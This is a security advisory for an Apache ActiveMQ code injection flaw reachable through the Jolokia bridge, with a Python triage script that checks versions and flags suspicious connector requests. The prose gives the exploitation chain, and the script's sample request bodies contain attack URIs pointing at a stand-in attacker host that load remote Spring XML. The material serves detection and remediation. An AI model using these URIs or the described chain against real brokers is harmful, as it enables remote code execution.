Apache ActiveMQ Code Injection Vulnerability Allowing Arbitrary Code Execution

Vulnerability

A code injection vulnerability has been identified in Apache ActiveMQ Broker and Apache ActiveMQ All. It affects releases before 5.19.6 and releases from 6.0.0 up to but not including 6.2.5. An authenticated attacker can bypass the earlier fix by adding a connector that uses the HTTP Discovery transport, through BrokerView.addNetworkConnector or BrokerView.addConnector, when the activemq-http module is available. The attacker-controlled HTTP discovery endpoint returns a VM transport URI, and that VM transport is then used to load a remote Spring XML application context, giving arbitrary code execution in the broker's JVM.

Impact

Successful exploitation gives the attacker arbitrary code execution in the broker's JVM; code loaded that way runs with the privileges of the broker process.

Reproduction

An authenticated user sends a request to the broker's Jolokia JMX-HTTP bridge that invokes BrokerView.addNetworkConnector or BrokerView.addConnector with a crafted discovery URI; this requires the activemq-http module to be on the classpath. The discovery URI points at an attacker-controlled HTTP endpoint that returns a VM transport URI, which bypasses the validation introduced for CVE-2026-34197. Once the VM transport is accepted, its brokerConfig parameter is used to load a remote Spring XML application context, and the code in that context executes in the broker's JVM.

Remediation

Upgrade to Apache ActiveMQ 5.19.6 or 6.2.5, which address this vulnerability. Because the attack is carried out by an authenticated caller through the Jolokia JMX-HTTP bridge, restricting who can reach that endpoint and who holds credentials for it limits exposure until the upgrade is applied.
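The following triage helper is an added example, not code from the advisory or from the ActiveMQ project. It covers the two practical checks the Reproduction and Remediation sections imply: whether a broker version falls in the affected ranges named above, and whether a Jolokia request body invokes BrokerView.addNetworkConnector or addConnector with a connector URI that matches the described chain (an HTTP discovery URI, or a vm: URI carrying brokerConfig). The sample request bodies are constructed, not captured traffic; the exact URI shapes (discovery:(http://...), vm://...?brokerConfig=xbean:...) and the MBean name pattern type=Broker are assumptions based on ActiveMQ's documented conventions, so adjust them to what your deployment actually logs.

```python
"""Triage helpers for the ActiveMQ Jolokia connector-injection issue.

Added example (not project code). Assumes:
  - affected ranges exactly as the advisory states them,
  - Jolokia JSON request bodies (single object or bulk list),
  - BrokerView registered under an ObjectName containing type=Broker,
  - connector URIs shaped like discovery:(http://...) or vm://...?brokerConfig=...
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

SUSPICIOUS_OPS = {"addNetworkConnector", "addConnector"}


def parse_version(version):
    """'6.2.5-SNAPSHOT' -> (6, 2, 5); missing components are zero-filled."""
    core = version.strip().split("-")[0]
    parts = [int(p) for p in core.split(".")]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_affected(version):
    """True if version is < 5.19.6, or 6.0.0 <= version < 6.2.5 (the ranges above)."""
    v = parse_version(version)
    if v < (5, 19, 6):
        return True
    return (6, 0, 0) <= v < (6, 2, 5)


def _uri_reason(uri):
    """Explain why a connector URI matches the attack chain, or return None."""
    low = uri.strip().lower()
    # Step 1 of the chain: connector resolved via HTTP discovery from a remote endpoint.
    if low.startswith("discovery:") and ("http://" in low or "https://" in low):
        return "HTTP discovery transport resolves the connector from a remote endpoint"
    # Step 2 of the chain: a vm: transport whose brokerConfig loads a Spring XML context.
    if low.startswith("vm:"):
        params = parse_qs(urlsplit(uri).query)
        if "brokerConfig" in params:
            return "vm: transport with brokerConfig=" + params["brokerConfig"][0]
    return None


def flag_jolokia_exec(body):
    """Return [(severity, message), ...] for connector additions in a Jolokia body.

    'high'   = URI matches the described chain; 'review' = connector added via
    Jolokia with an unremarkable URI (confirm it was intended). [] = nothing matched.
    """
    reqs = json.loads(body) if isinstance(body, str) else body
    if isinstance(reqs, dict):
        reqs = [reqs]
    findings = []
    for req in reqs:
        if str(req.get("type", "")).lower() != "exec":
            continue
        mbean = str(req.get("mbean", ""))
        if "type=Broker" not in mbean:  # BrokerView ObjectName (assumed pattern)
            continue
        # Jolokia may spell the operation with its signature: addConnector(java.lang.String)
        op = re.sub(r"\(.*\)$", "", str(req.get("operation", ""))).strip()
        if op not in SUSPICIOUS_OPS:
            continue
        matched = False
        for arg in req.get("arguments") or []:
            if isinstance(arg, str):
                reason = _uri_reason(arg)
                if reason:
                    findings.append(("high", f"{op}: {reason} [{arg}]"))
                    matched = True
        if not matched:
            findings.append(("review", f"{op} invoked via Jolokia on {mbean}"))
    return findings


# Constructed sample bodies (not captured traffic).
BROKER = "org.apache.activemq:type=Broker,brokerName=localhost"
ATTACK_DISCOVERY = json.dumps({"type": "exec", "mbean": BROKER,
                               "operation": "addNetworkConnector(java.lang.String)",
                               "arguments": ["discovery:(http://attacker.example:8080/disc)"]})
ATTACK_VM = json.dumps({"type": "exec", "mbean": BROKER, "operation": "addConnector",
                        "arguments": ["vm://localhost?brokerConfig=xbean:http://attacker.example/ctx.xml"]})
BENIGN_READ = json.dumps({"type": "read", "mbean": BROKER, "attribute": "TotalMessageCount"})
BENIGN_ADMIN = json.dumps({"type": "exec", "mbean": BROKER, "operation": "addConnector",
                           "arguments": ["tcp://0.0.0.0:61617"]})

if __name__ == "__main__":
    for v in ("5.18.3", "5.19.6", "6.2.4", "6.2.5"):
        print(v, "affected" if is_affected(v) else "fixed")
    for name, body in (("discovery", ATTACK_DISCOVERY), ("vm", ATTACK_VM),
                       ("read", BENIGN_READ), ("admin", BENIGN_ADMIN)):
        print(name, flag_jolokia_exec(body))
```

Run it against request bodies recorded at a reverse proxy in front of the Jolokia endpoint, or against the broker's own request logging if enabled; the 'review' findings are the baseline of legitimate administrative connector changes, and anything marked 'high' on a broker whose version is_affected reports as vulnerable should be treated as an attempted exploitation.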

Added: Apr 24, 2026, 11:23 AM
Updated: Apr 24, 2026, 11:23 AM

Vulnerability Rating

Custom Algorithm

spread          5.7
impact          7.5
exploitability  4.2
remediation     7.7
relevance       6.3
threat          2.0
urgency         2.9
incentive       0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.